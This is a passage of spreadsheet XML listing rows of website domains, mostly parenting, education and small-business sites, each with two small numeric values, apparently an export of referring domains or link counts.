        <x:v>https://garmurdesign.com</x:v>
      </x:c>
      <x:c r="B161" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C161" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="162">
      <x:c r="A162" s="86" t="str">
        <x:v>https://parentingwithindependence.com</x:v>
      </x:c>
      <x:c r="B162" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C162" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="163">
      <x:c r="A163" s="86" t="str">
        <x:v>https://rookee.com.cn</x:v>
      </x:c>
      <x:c r="B163" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C163" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="164">
      <x:c r="A164" s="86" t="str">
        <x:v>https://aicbit.com</x:v>
      </x:c>
      <x:c r="B164" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C164" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="165">
      <x:c r="A165" s="86" t="str">
        <x:v>https://mpdevx.com</x:v>
      </x:c>
      <x:c r="B165" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C165" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="166">
      <x:c r="A166" s="86" t="str">
        <x:v>https://dvonee.com</x:v>
      </x:c>
      <x:c r="B166" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C166" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="167">
      <x:c r="A167" s="86" t="str">
        <x:v>https://twinkl.co.th</x:v>
      </x:c>
      <x:c r="B167" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C167" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="168">
      <x:c r="A168" s="86" t="str">
        <x:v>https://unknownbrewing.com</x:v>
      </x:c>
      <x:c r="B168" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C168" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="169">
      <x:c r="A169" s="86" t="str">
        <x:v>https://craftsy.life</x:v>
      </x:c>
      <x:c r="B169" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C169" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="170">
      <x:c r="A170" s="86" t="str">
        <x:v>https://handsonaswegrow.com</x:v>
      </x:c>
      <x:c r="B170" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C170" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="171">
      <x:c r="A171" s="86" t="str">
        <x:v>https://coris-asset.com</x:v>
      </x:c>
      <x:c r="B171" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C171" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="172">
      <x:c r="A172" s="86" t="str">
        <x:v>https://twinkl.com.pe</x:v>
      </x:c>
      <x:c r="B172" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C172" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="173">
      <x:c r="A173" s="86" t="str">
        <x:v>https://masterinsure.com.br</x:v>
      </x:c>
      <x:c r="B173" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C173" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="174">
      <x:c r="A174" s="86" t="str">
        <x:v>https://vnnergy.com</x:v>
      </x:c>
      <x:c r="B174" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C174" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="175">
      <x:c r="A175" s="86" t="str">
        <x:v>https://lovemum.blog</x:v>
      </x:c>
      <x:c r="B175" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C175" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="176">
      <x:c r="A176" s="86" t="str">
        <x:v>https://tebdiy.com</x:v>
      </x:c>
      <x:c r="B176" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C176" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="177">
      <x:c r="A177" s="86" t="str">
        <x:v>https://homeharmonynow.org</x:v>
      </x:c>
      <x:c r="B177" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C177" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="178">
      <x:c r="A178" s="86" t="str">
        <x:v>https://pcdn.co</x:v>
      </x:c>
      <x:c r="B178" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C178" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="179">
      <x:c r="A179" s="86" t="str">
        <x:v>https://thelovedchild.net</x:v>
      </x:c>
      <x:c r="B179" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C179" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="180">
      <x:c r="A180" s="86" t="str">
        <x:v>https://kprz.com</x:v>
      </x:c>
      <x:c r="B180" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C180" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="181">
      <x:c r="A181" s="86" t="str">
        <x:v>https://cmpusa.org</x:v>
      </x:c>
      <x:c r="B181" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C181" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="182">
      <x:c r="A182" s="86" t="str">
        <x:v>https://gentle-parent.com</x:v>
      </x:c>
      <x:c r="B182" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C182" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="183">
      <x:c r="A183" s="86" t="str">
        <x:v>https://richter-ahland.com</x:v>
      </x:c>
      <x:c r="B183" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C183" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="184">
      <x:c r="A184" s="86" t="str">
        <x:v>https://globuya.com</x:v>
      </x:c>
      <x:c r="B184" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C184" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="185">
      <x:c r="A185" s="86" t="str">
        <x:v>https://accountedforyou.com.au</x:v>
      </x:c>
      <x:c r="B185" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C185" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="186">
      <x:c r="A186" s="86" t="str">
        <x:v>https://expert-bremerhaven.com</x:v>
      </x:c>
      <x:c r="B186" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C186" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="187">
      <x:c r="A187" s="86" t="str">
        <x:v>https://educhildcare.com.au</x:v>
      </x:c>
      <x:c r="B187" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C187" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="188">
      <x:c r="A188" s="86" t="str">
        <x:v>https://mzaxazm.com</x:v>
      </x:c>
      <x:c r="B188" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C188" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="189">
      <x:c r="A189" s="86" t="str">
        <x:v>https://teachersconnect.co</x:v>
      </x:c>
      <x:c r="B189" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C189" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="190">
      <x:c r="A190" s="86" t="str">
        <x:v>https://makecalmlovely.com</x:v>
      </x:c>
      <x:c r="B190" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C190" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="191">
      <x:c r="A191" s="86" t="str">
        <x:v>https://machinery.world</x:v>
      </x:c>
      <x:c r="B191" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C191" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="192">
      <x:c r="A192" s="86" t="str">
        <x:v>https://woofsofwimbledon.com</x:v>
      </x:c>
      <x:c r="B192" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C192" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="193">
      <x:c r="A193" s="86" t="str">
        <x:v>https://keeptoddlersbusy.com</x:v>
      </x:c>
      <x:c r="B193" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C193" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="194">
      <x:c r="A194" s="86" t="str">
        <x:v>https://sonningcommonprimary.co.uk</x:v>
      </x:c>
      <x:c r="B194" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C194" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="195">
      <x:c r="A195" s="86" t="str">
        <x:v>https://solarlivingsavvy.com</x:v>
      </x:c>
      <x:c r="B195" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C195" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="196">
      <x:c r="A196" s="86" t="str">
        <x:v>https://getblogo.com</x:v>
      </x:c>
      <x:c r="B196" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C196" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="197">
      <x:c r="A197" s="86" t="str">
        <x:v>https://dyslexia-testing.co.uk</x:v>
      </x:c>
      <x:c r="B197" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C197" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="198">
      <x:c r="A198" s="86" t="str">
        <x:v>https://livinglifeandlearning.com</x:v>
      </x:c>
      <x:c r="B198" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C198" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="199">
      <x:c r="A199" s="86" t="str">
        <x:v>https://webflow.io</x:v>
      </x:c>
      <x:c r="B199" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C199" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="200">
      <x:c r="A200" s="86" t="str">
        <x:v>https://thrivecart.com</x:v>
      </x:c>
      <x:c r="B200" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C200" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="201">
      <x:c r="A201" s="86" t="str">
        <x:v>https://thecanadianhomeschooler.com</x:v>
      </x:c>
      <x:c r="B201" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C201" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="202">
      <x:c r="A202" s="86" t="str">
        <x:v>https://pearltrees.com</x:v>
      </x:c>
      <x:c r="B202" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C202" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="203">
      <x:c r="A203" s="86" t="str">
        <x:v>https://660amtheanswer.com</x:v>
      </x:c>
      <x:c r="B203" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C203" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="204">
      <x:c r="A204" s="86" t="str">
        <x:v>https://thelotteryhub.com</x:v>
      </x:c>
      <x:c r="B204" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C204" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="205">
      <x:c r="A205" s="86" t="str">
        <x:v>https://twinkl.co.cr</x:v>
      </x:c>
      <x:c r="B205" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C205" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="206">
      <x:c r="A206" s="86" t="str">
        <x:v>https://twinkl.com.sg</x:v>
      </x:c>
      <x:c r="B206" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C206" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="207">
      <x:c r="A207" s="86" t="str">
        <x:v>https://papelariajardimbotanico.com.br</x:v>
      </x:c>
      <x:c r="B207" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C207" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="208">
      <x:c r="A208" s="86" t="str">
        <x:v>https://thenaturalspa.info</x:v>
      </x:c>
      <x:c r="B208" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C208" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="209">
      <x:c r="A209" s="86" t="str">
        <x:v>https://mpdevx3.com</x:v>
      </x:c>
      <x:c r="B209" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C209" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="210">
      <x:c r="A210" s="86" t="str">
        <x:v>https://umaconferences.com</x:v>
      </x:c>
      <x:c r="B210" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C210" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="211">
      <x:c r="A211" s="86" t="str">
        <x:v>https://hudsonvalleybabies.org</x:v>
      </x:c>
      <x:c r="B211" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C211" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="212">
      <x:c r="A212" s="86" t="str">
        <x:v>https://jatsszunk-egyutt.hu</x:v>
      </x:c>
      <x:c r="B212" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C212" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="213">
      <x:c r="A213" s="86" t="str">
        <x:v>https://westlothian.org.uk</x:v>
      </x:c>
      <x:c r="B213" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C213" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="214">
      <x:c r="A214" s="86" t="str">
        <x:v>https://greatwoodfarm.co.uk</x:v>
      </x:c>
      <x:c r="B214" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C214" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="215">
      <x:c r="A215" s="86" t="str">
        <x:v>https://crosswalk.com</x:v>
      </x:c>
      <x:c r="B215" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C215" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="216">
      <x:c r="A216" s="86" t="str">
        <x:v>https://rlavr.com</x:v>
      </x:c>
      <x:c r="B216" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C216" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="217">
      <x:c r="A217" s="86" t="str">
        <x:v>https://twinkl.com.ph</x:v>
      </x:c>
      <x:c r="B217" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C217" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="218">
      <x:c r="A218" s="86" t="str">
        <x:v>https://breastfeeding-assistance.com</x:v>
      </x:c>
      <x:c r="B218" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C218" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="219">
      <x:c r="A219" s="86" t="str">
        <x:v>https://myshopify.com</x:v>
      </x:c>
      <x:c r="B219" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C219" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="220">
      <x:c r="A220" s="86" t="str">
        <x:v>https://twinkl.ar</x:v>
      </x:c>
      <x:c r="B220" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C220" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="221">
      <x:c r="A221" s="86" t="str">
        <x:v>https://rgsoftwares.com</x:v>
      </x:c>
      <x:c r="B221" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C221" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="222">
      <x:c r="A222" s="86" t="str">
        <x:v>https://diyncrafty.com</x:v>
      </x:c>
      <x:c r="B222" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C222" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="223">
      <x:c r="A223" s="86" t="str">
        <x:v>https://tradeloan.com.au</x:v>
      </x:c>
      <x:c r="B223" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C223" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="224">
      <x:c r="A224" s="86" t="str">
        <x:v>https://happytoddlerplaytime.com</x:v>
      </x:c>
      <x:c r="B224" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C224" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="225">
      <x:c r="A225" s="86" t="str">
        <x:v>https://hivapcop.org</x:v>
      </x:c>
      <x:c r="B225" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C225" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="226">
      <x:c r="A226" s="86" t="str">
        <x:v>https://mamanista.com</x:v>
      </x:c>
      <x:c r="B226" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C226" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="227">
      <x:c r="A227" s="86" t="str">
        <x:v>https://touchlinevideo.com</x:v>
      </x:c>
      <x:c r="B227" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C227" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="228">
      <x:c r="A228" s="86" t="str">
        <x:v>https://twinkl.co.ke</x:v>
      </x:c>
      <x:c r="B228" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C228" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="229">
      <x:c r="A229" s="86" t="str">
        <x:v>https://twinkl.ie</x:v>
      </x:c>
      <x:c r="B229" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C229" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="230">
      <x:c r="A230" s="86" t="str">
        <x:v>https://resolvefunding.com.au</x:v>
      </x:c>
      <x:c r="B230" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C230" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="231">
      <x:c r="A231" s="86" t="str">
        <x:v>https://rainbowprintables.com</x:v>
      </x:c>
      <x:c r="B231" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C231" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="232">
      <x:c r="A232" s="86" t="str">
        <x:v>https://theanswerpgh.com</x:v>
      </x:c>
      <x:c r="B232" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C232" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="233">
      <x:c r="A233" s="86" t="str">
        <x:v>https://kiddipedia.com.au</x:v>
      </x:c>
      <x:c r="B233" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C233" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="234">
      <x:c r="A234" s="86" t="str">
        <x:v>https://dalfuayleq.org.sa</x:v>
      </x:c>
      <x:c r="B234" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C234" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="235">
      <x:c r="A235" s="86" t="str">
        <x:v>https://skyshirts.com</x:v>
      </x:c>
      <x:c r="B235" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C235" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="236">
      <x:c r="A236" s="86" t="str">
        <x:v>https://homebnc.com</x:v>
      </x:c>
      <x:c r="B236" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C236" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="237">
      <x:c r="A237" s="86" t="str">
        <x:v>https://topnotchteaching.com</x:v>
      </x:c>
      <x:c r="B237" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C237" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="238">
      <x:c r="A238" s="86" t="str">
        <x:v>https://thetoddlerplaybook.com</x:v>
      </x:c>
      <x:c r="B238" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C238" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="239">
      <x:c r="A239" s="86" t="str">
        <x:v>https://maydayva.com.au</x:v>
      </x:c>
      <x:c r="B239" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C239" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="240">
      <x:c r="A240" s="86" t="str">
        <x:v>https://wildflowerslc.com</x:v>
      </x:c>
      <x:c r="B240" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C240" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="241">
      <x:c r="A241" s="86" t="str">
        <x:v>https://twinkl.es</x:v>
      </x:c>
      <x:c r="B241" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C241" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="242">
      <x:c r="A242" s="86" t="str">
        <x:v>https://travelplayexplore.com</x:v>
      </x:c>
      <x:c r="B242" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C242" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="243">
      <x:c r="A243" s="86" t="str">
        <x:v>https://lowfeye.top</x:v>
      </x:c>
      <x:c r="B243" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C243" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="244">
      <x:c r="A244" s="86" t="str">
        <x:v>https://jennasrootz.com</x:v>
      </x:c>
      <x:c r="B244" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C244" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="245">
      <x:c r="A245" s="86" t="str">
        <x:v>https://twinkl.gr</x:v>
      </x:c>
      <x:c r="B245" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C245" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="246">
      <x:c r="A246" s="86" t="str">
        <x:v>https://frasersfunhouse.com</x:v>
      </x:c>
      <x:c r="B246" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C246" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="247">
      <x:c r="A247" s="86" t="str">
        <x:v>https://localgymsandfitness.com</x:v>
      </x:c>
      <x:c r="B247" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C247" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="248">
      <x:c r="A248" s="86" t="str">
        <x:v>https://taminglittlemonsters.com</x:v>
      </x:c>
      <x:c r="B248" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C248" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="249">
      <x:c r="A249" s="86" t="str">
        <x:v>https://archfoundation.org</x:v>
      </x:c>
      <x:c r="B249" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C249" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="250">
      <x:c r="A250" s="86" t="str">
        <x:v>https://freckledfrog.com.au</x:v>
      </x:c>
      <x:c r="B250" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C250" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="251">
      <x:c r="A251" s="86" t="str">
        <x:v>https://weekendnotes.com</x:v>
      </x:c>
      <x:c r="B251" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C251" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="252">
      <x:c r="A252" s="86" t="str">
        <x:v>https://decorfrost.com</x:v>
      </x:c>
      <x:c r="B252" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C252" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="253">
      <x:c r="A253" s="86" t="str">
        <x:v>https://toptravelescapes.com</x:v>
      </x:c>
      <x:c r="B253" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C253" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="254">
      <x:c r="A254" s="86" t="str">
        <x:v>https://cloudns.ph</x:v>
      </x:c>
      <x:c r="B254" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C254" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="255">
      <x:c r="A255" s="86" t="str">
        <x:v>https://lopezdiez.store</x:v>
      </x:c>
      <x:c r="B255" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C255" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="256">
      <x:c r="A256" s="86" t="str">
        <x:v>https://newyorkdigitalnews.org</x:v>
      </x:c>
      <x:c r="B256" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C256" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="257">
      <x:c r="A257" s="86" t="str">
        <x:v>https://letsmama.com</x:v>
      </x:c>
      <x:c r="B257" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C257" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="258">
      <x:c r="A258" s="86" t="str">
        <x:v>https://twinkl.my</x:v>
      </x:c>
      <x:c r="B258" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C258" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="259">
      <x:c r="A259" s="86" t="str">
        <x:v>https://notquitemarypoppins.com</x:v>
      </x:c>
      <x:c r="B259" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C259" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="260">
      <x:c r="A260" s="86" t="str">
        <x:v>https://harrismithmarathonclub.co.za</x:v>
      </x:c>
      <x:c r="B260" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C260" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="261">
      <x:c r="A261" s="86" t="str">
        <x:v>https://letstalkfaith.com</x:v>
      </x:c>
      <x:c r="B261" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C261" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="262">
      <x:c r="A262" s="86" t="str">
        <x:v>https://happinessypunto.com</x:v>
      </x:c>
      <x:c r="B262" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C262" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="263">
      <x:c r="A263" s="86" t="str">
        <x:v>https://gift-kids.org</x:v>
      </x:c>
      <x:c r="B263" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C263" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="264">
      <x:c r="A264" s="86" t="str">
        <x:v>https://busytoddler.com</x:v>
      </x:c>
      <x:c r="B264" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C264" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="265">
      <x:c r="A265" s="86" t="str">
        <x:v>https://twinkl.com.sa</x:v>
      </x:c>
      <x:c r="B265" s="86" t="str">
